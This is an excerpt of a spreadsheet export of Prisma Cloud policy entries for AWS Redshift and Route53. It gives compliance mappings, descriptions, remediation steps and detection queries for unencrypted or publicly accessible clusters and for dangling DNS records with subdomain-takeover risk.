Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, ISO 27001:2013, NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), SOC 2, ISO 27001:2013, NIST SP 800-171 Revision 3, CSA CCM v3.0.1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev4, PCI DSS v4.0, NIST CSF v2.0, Telecommunications Security Act - TSA, NIST 800-53 Rev 5, MLPS 2.0, CRI Profile v2.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, NIST 800-171 Rev1, NIST SP 800-171 Revision 3, jbrox - GDPR, DORA, PCI DSS v4.0, APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, HITRUST CSF v9.3 [Deprecated], Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], PCI DSS v4.0, GDPR, HIPAA, HITRUST CSF v9.3 [Deprecated], Risk Management in Technology (RMiT), PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, MLPS 2.0 (Level 3), CRI Profile v2.0, Fedramp (Moderate), CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CSA CCM v3.0.1, CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, jneytchev-fedramp-low, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2060" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2060" s="2" t="inlineStr"/>
      <c r="D2060" t="inlineStr"/>
      <c r="E2060" t="inlineStr"/>
      <c r="F2060" t="inlineStr"/>
      <c r="G2060" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2060" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K2060" t="inlineStr">
        <is>
          <t>AWS Redshift instances are not encrypted</t>
        </is>
      </c>
      <c r="L2060" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2060" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2060" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2060" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2060" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2060" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2060" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2060" t="inlineStr">
        <is>
          <t>PCI DSS v3.2</t>
        </is>
      </c>
      <c r="T2060" t="b">
        <v>0</v>
      </c>
      <c r="U2060" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2060" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W2060" t="inlineStr">
        <is>
          <t>This policy identifies AWS Redshift instances which are not encrypted. These instances should be encrypted for clusters to help protect data at rest which otherwise can result in a data breach.</t>
        </is>
      </c>
      <c r="X2060" t="inlineStr">
        <is>
          <t>To enable encryption on your Redshift cluster follow the steps mentioned in below URL:
https://docs.aws.amazon.com/redshift/latest/mgmt/changing-cluster-encryption.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-25
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-25</t>
        </is>
      </c>
      <c r="Y2060" t="inlineStr"/>
      <c r="Z2060" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-redshift-describe-clusters' AND json.rule='encrypted is false'
{"category":"General","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA2060" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2060" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2060" t="inlineStr">
        <is>
          <t>PC-AWS-RED-42-CKV_AWS_64</t>
        </is>
      </c>
      <c r="AD2060" t="b">
        <v>1</v>
      </c>
      <c r="AE2060" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2060" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>0132bbb2-c733-4c36-9c5d-c58967c7d1a6</t>
        </is>
      </c>
      <c r="AI2060" t="inlineStr">
        <is>
          <t>0132bbb2-c733-4c36-9c5d-c58967c7d1a6</t>
        </is>
      </c>
      <c r="AJ2060" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2060" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2061">
      <c r="A2061" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, SOC 2, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 1, ISO/IEC 27001:2022, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2061" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2061" s="2" t="inlineStr"/>
      <c r="D2061" t="inlineStr"/>
      <c r="E2061" t="inlineStr"/>
      <c r="F2061" t="inlineStr"/>
      <c r="G2061" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2061" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K2061" t="inlineStr">
        <is>
          <t>AWS Redshift cluster with commonly used master username and public access setting enabled</t>
        </is>
      </c>
      <c r="L2061" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2061" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2061" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2061" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2061" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2061" t="inlineStr">
        <is>
          <t>IA</t>
        </is>
      </c>
      <c r="R2061" t="inlineStr">
        <is>
          <t>IA-05-01 : Authenticator Management | Password-based Authentication</t>
        </is>
      </c>
      <c r="S2061" t="inlineStr"/>
      <c r="T2061" t="b">
        <v>0</v>
      </c>
      <c r="U2061" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2061" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W2061" t="inlineStr">
        <is>
          <t>This policy identifies AWS Redshift clusters configured with commonly used master usernames like 'awsuser', 'administrator', or 'admin', and the public access setting is enabled.
AWS Redshift, a managed data warehousing service typically stores sensitive and critical data. Allowing public access increases the risk of unauthorized access, data breaches, and potential malicious activities. Using standard usernames increases the risk of password brute-force attacks by potential intruders.
As a recommended security measure, it is advised not to use commonly used usernames and to disable public access for the Redshift cluster.</t>
        </is>
      </c>
      <c r="X2061" t="inlineStr">
        <is>
          <t>Changing the default master user name for your existing Amazon Redshift clusters requires relaunching those clusters with a different master user name and migrating the existing data to the new clusters.
To launch the new Redshift database clusters,
1. Sign in to the AWS Management Console and open the Amazon Redshift console at https://console.aws.amazon.com/redshift/.
2. On the navigation menu, choose 'Clusters'. The clusters for your account in the current AWS Region are listed. A subset of the properties of each cluster is displayed in columns in the list.
3. Choose 'Create cluster' to create a cluster.
4. Follow the instructions on the console page to enter the properties for Cluster configuration.
5. In the 'Database configuration' section, type a unique (non-default) user name within the 'Master user name' field.
6. In the 'Additional configurations', Under the 'Network and security' Dropdown, Ensure the checkbox 'Turn on Publicly accessible' in the 'Publicly accessible' section is unchecked.
7. Fill out the rest of the fields available on this page with the information taken from the existing cluster.
8. Choose 'Create cluster' to create the cluster. The cluster might take several minutes to be ready to use.
9. Once the Cluster Status value changes to available and the DB Health status changes to healthy, the new cluster can used to load the existing data from the old cluster.
10. Once the data migration process is completed and all the data is loaded into the new Redshift cluster and all applications configured to use the new cluster, delete the old cluster.
To delete the existing cluster, refer to the below link.
https://docs.aws.amazon.com/redshift/latest/mgmt/managing-clusters-console.html#delete-cluster</t>
        </is>
      </c>
      <c r="Y2061" t="inlineStr"/>
      <c r="Z2061" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-redshift-describe-clusters' AND json.rule = publiclyAccessible is true and masterUsername is member of ("awsuser","administrator","admin")</t>
        </is>
      </c>
      <c r="AA2061" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2061" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2061" t="inlineStr">
        <is>
          <t>PC-AWS-RED-1122</t>
        </is>
      </c>
      <c r="AD2061" t="b">
        <v>1</v>
      </c>
      <c r="AE2061" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2061" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>4482eb7e-513a-4620-922f-16f495fbc4b0</t>
        </is>
      </c>
      <c r="AI2061" t="inlineStr">
        <is>
          <t>34c38872-f4ff-474a-bdc1-e813bbf9757a</t>
        </is>
      </c>
      <c r="AJ2061" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2061" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2062">
      <c r="A2062" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, MLPS 2.0 (Level 3)</t>
        </is>
      </c>
      <c r="B2062" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2062" s="2" t="inlineStr"/>
      <c r="D2062" t="inlineStr"/>
      <c r="E2062" t="inlineStr"/>
      <c r="F2062" t="inlineStr"/>
      <c r="G2062" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2062" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K2062" t="inlineStr">
        <is>
          <t>AWS Redshift cluster instance with public access setting enabled</t>
        </is>
      </c>
      <c r="L2062" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2062" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2062" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2062" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2062" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2062" t="inlineStr">
        <is>
          <t>8.1.3</t>
        </is>
      </c>
      <c r="R2062" t="inlineStr">
        <is>
          <t>8.1.3.2</t>
        </is>
      </c>
      <c r="S2062" t="inlineStr"/>
      <c r="T2062" t="b">
        <v>0</v>
      </c>
      <c r="U2062" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2062" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W2062" t="inlineStr">
        <is>
          <t>This policy identifies AWS Redshift clusters with public access setting enabled.
AWS Redshift, a managed data warehousing service typically stores sensitive and critical data. Allowing public access increases the risk of unauthorized access, data breaches, and potential malicious activities.
As a recommended security measure, it is advised to disable public access for the Redshift cluster.</t>
        </is>
      </c>
      <c r="X2062" t="inlineStr">
        <is>
          <t>To modify the publicly accessible setting of the Redshift cluster,
1. Sign in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to the 'Redshift' service.
4. Click on the checkbox for the identified Redshift cluster name.
5. In the top menu options, click on 'Actions' and select 'Modify publicly accessible setting' as the option.
6. Uncheck the checkbox 'Turn on Publicly accessible' in the 'Publicly accessible' section and click on 'Save Changes' button. 
Build Recommendation: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/public-policies/public-9.html
IaC: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/public-policies/public-9.html</t>
        </is>
      </c>
      <c r="Y2062" t="inlineStr"/>
      <c r="Z2062" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-redshift-describe-clusters' AND json.rule = publiclyAccessible is true
{"category":"Public","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA2062" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2062" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2062" t="inlineStr">
        <is>
          <t>PC-AWS-RED-1118-CKV_AWS_87</t>
        </is>
      </c>
      <c r="AD2062" t="b">
        <v>1</v>
      </c>
      <c r="AE2062" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2062" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>f7e5da40-e30e-43d2-81d3-a5f59aa38b21</t>
        </is>
      </c>
      <c r="AI2062" t="inlineStr">
        <is>
          <t>363c26e8-3875-4b4c-a8e2-809f7fc8457f</t>
        </is>
      </c>
      <c r="AJ2062" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2062" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2063">
      <c r="A2063" t="inlineStr"/>
      <c r="B2063" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2063" s="2" t="inlineStr"/>
      <c r="D2063" t="inlineStr"/>
      <c r="E2063" t="inlineStr"/>
      <c r="F2063" t="inlineStr"/>
      <c r="G2063" t="b">
        <v>0</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2063" t="inlineStr">
        <is>
          <t>aws-route53</t>
        </is>
      </c>
      <c r="K2063" t="inlineStr">
        <is>
          <t>New DNS record entry route 53</t>
        </is>
      </c>
      <c r="L2063" t="inlineStr"/>
      <c r="M2063" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2063" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2063" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2063" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2063" t="inlineStr"/>
      <c r="R2063" t="inlineStr"/>
      <c r="S2063" t="inlineStr">
        <is>
          <t>TestLabel</t>
        </is>
      </c>
      <c r="T2063" t="b">
        <v>0</v>
      </c>
      <c r="U2063" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2063" t="inlineStr">
        <is>
          <t>aws-route53-list-hosted-zones</t>
        </is>
      </c>
      <c r="W2063" t="inlineStr"/>
      <c r="X2063" t="inlineStr"/>
      <c r="Y2063" t="inlineStr"/>
      <c r="Z2063" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.service = 'Amazon Route53' AND api.name = 'aws-route53-list-hosted-zones' AND json.rule = hostedZone.name equals "cometlab.tk." AND hostedZone.resourceRecordSetCount greater than 4</t>
        </is>
      </c>
      <c r="AA2063" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2063" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2063" t="inlineStr"/>
      <c r="AD2063" t="b">
        <v>0</v>
      </c>
      <c r="AE2063" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2063" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>3fcdc980-079f-4031-8083-5b90edc45724</t>
        </is>
      </c>
      <c r="AI2063" t="inlineStr">
        <is>
          <t>d2f31bb8-d7ee-400d-8a3f-51830cbac39b</t>
        </is>
      </c>
      <c r="AJ2063" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2063" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2064">
      <c r="A2064" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HITRUST CSF v.11.2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF v2.0, CRI Profile v2.0, NIST CSF v2.0, ITSG-33, TX-RAMP Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, DORA</t>
        </is>
      </c>
      <c r="B2064" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2064" s="2" t="inlineStr"/>
      <c r="D2064" t="inlineStr"/>
      <c r="E2064" t="inlineStr"/>
      <c r="F2064" t="inlineStr"/>
      <c r="G2064" t="b">
        <v>1</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2064" t="inlineStr">
        <is>
          <t>aws-route53</t>
        </is>
      </c>
      <c r="K2064" t="inlineStr">
        <is>
          <t>AWS Route53 Hosted Zone having dangling DNS record with subdomain takeover risk associated with AWS Elastic Beanstalk Instance</t>
        </is>
      </c>
      <c r="L2064" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M2064" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2064" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2064" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2064" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2064" t="inlineStr">
        <is>
          <t>Chapter IV</t>
        </is>
      </c>
      <c r="R2064" t="inlineStr">
        <is>
          <t>Article 25, Testing of ICT tools and systems</t>
        </is>
      </c>
      <c r="S2064" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2064" t="b">
        <v>0</v>
      </c>
      <c r="U2064" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2064" t="inlineStr">
        <is>
          <t>aws-route53-list-hosted-zones</t>
        </is>
      </c>
      <c r="W2064" t="inlineStr">
        <is>
          <t>This policy identifies AWS Route53 Hosted Zones which have dangling DNS records with subdomain takeover risk. A Route53 Hosted Zone having a CNAME entry pointing to a non-existing Elastic Beanstalk (EBS) will have a risk of these dangling domain entries being taken over by an attacker by creating a similar Elastic beanstalk (EBS) in any AWS account which the attacker owns / controls. Attackers can use this domain to do phishing attacks, spread malware and other illegal activities. As a best practice, it is recommended to delete dangling DNS records entry from your AWS Route 53 hosted zones.
Note: Please ignore the reported alert if the Elastic Beanstalk (EBS) configured in the Route53 Hosted Zone DNS record are in different accounts.</t>
        </is>
      </c>
      <c r="X2064" t="inlineStr">
        <is>
          <t>Identify DNS record entry pointing to a non-existing Elastic Beanstalk (EBS) resource.
To remove DNS record entry, follow steps given in following URL:
https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resource-record-sets-deleting.html</t>
        </is>
      </c>
      <c r="Y2064" t="inlineStr"/>
      <c r="Z2064" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-route53-list-hosted-zones' AND json.rule = hostedZone.config.privateZone is false and resourceRecordSet[?any( type equals CNAME and resourceRecords[*].value contains elasticbeanstalk.com)] exists as X; config from cloud.resource where api.name = 'aws-elasticbeanstalk-environment' as Y; filter 'not (X.resourceRecordSet[*].resourceRecords[*].value intersects $.Y.cname)'; show X;</t>
        </is>
      </c>
      <c r="AA2064" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2064" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2064" t="inlineStr">
        <is>
          <t>PC-AWS-R53-1036</t>
        </is>
      </c>
      <c r="AD2064" t="b">
        <v>1</v>
      </c>
      <c r="AE2064" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2064" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>4b9dfe10-c19c-4b9f-a9d4-456cdea8d428</t>
        </is>
      </c>
      <c r="AI2064" t="inlineStr">
        <is>
          <t>5d345501-f43f-48be-90c1-b0d1d4a14a26</t>
        </is>
      </c>
      <c r="AJ2064" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2064" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2065">
      <c r="A2065" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HITRUST CSF v.11.2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Microsoft Cloud Security Benchmark v1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF v2.0, CRI Profile v2.0, NIST CSF v2.0, ITSG-33, TX-RAMP Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, DORA</t>
        </is>
      </c>
      <c r="B2065" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2065" s="2" t="inlineStr"/>
      <c r="D2065" t="inlineStr"/>
      <c r="E2065" t="inlineStr"/>
      <c r="F2065" t="inlineStr"/>
      <c r="G2065" t="b">
        <v>1</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2065" t="inlineStr">
        <is>
          <t>aws-route53</t>
        </is>
      </c>
      <c r="K2065" t="inlineStr">
        <is>
          <t>AWS Route53 Hosted Zone having dangling DNS record with subdomain takeover risk associated with AWS S3 Bucket</t>
        </is>
      </c>
      <c r="L2065" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2065" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2065" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2065" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2065" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2065" t="inlineStr">
        <is>
          <t>Chapter IV</t>
        </is>
      </c>
      <c r="R2065" t="inlineStr">
        <is>
          <t>Article 25, Testing of ICT tools and systems</t>
        </is>
      </c>
      <c r="S2065" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2065" t="b">
        <v>0</v>
      </c>
      <c r="U2065" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2065" t="inlineStr">
        <is>
          <t>aws-route53-list-hosted-zones</t>
        </is>
      </c>
      <c r="W2065" t="inlineStr">
        <is>
          <t>This policy identifies AWS Route53 Hosted Zones which have dangling DNS records with subdomain takeover risk associated with AWS S3 Bucket. A Route53 Hosted Zone having a CNAME entry pointing to a non-existing S3 bucket will have a risk of these dangling domain entries being taken over by an attacker by creating a similar S3 bucket in any AWS account which the attacker owns / controls. Attackers can use this domain to do phishing attacks, spread malware and other illegal activities. As a best practice, it is recommended to delete dangling DNS records entry from your AWS Route 53 hosted zones.</t>
        </is>
      </c>
      <c r="X2065" t="inlineStr">
        <is>
          <t>Identify DNS record entry pointing to a non-existing S3 bucket resource.
To remove DNS record entry, follow steps given in following URL:
https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resource-record-sets-deleting.html</t>
        </is>
      </c>
      <c r="Y2065" t="inlineStr"/>
      <c r="Z2065" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-route53-list-hosted-zones' AND json.rule = hostedZone.config.privateZone is false and resourceRecordSet[?any( type equals CNAME and resourceRecords[*].value contains s3-website )] exists as X; config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' as Y; filter 'not ($.X.resourceRecordSet[*].name intersects $.Y.bucketName)'; show X;</t>
        </is>
      </c>
      <c r="AA2065" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2065" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2065" t="inlineStr">
        <is>
          <t>PC-AWS-R53-991</t>
        </is>
      </c>
      <c r="AD2065" t="b">
        <v>1</v>
      </c>
      <c r="AE2065" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2065" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>74a38c42-ed2f-4172-b047-12be56495aca</t>
        </is>
      </c>
      <c r="AI2065" t="inlineStr">
        <is>
          <t>7a6582fb-4264-4805-9341-331be346e868</t>
        </is>
      </c>
      <c r="AJ2065" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2065" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2066">
      <c r="A2066" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev4, ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, ISO/IEC 27017:2015, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, NIST CSF, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, PCI DSS v4.0, CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, CIS Controls v8, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), ISO/IEC 27001:2022, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO 27002:2022, Copy of CIS Controls v8, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, 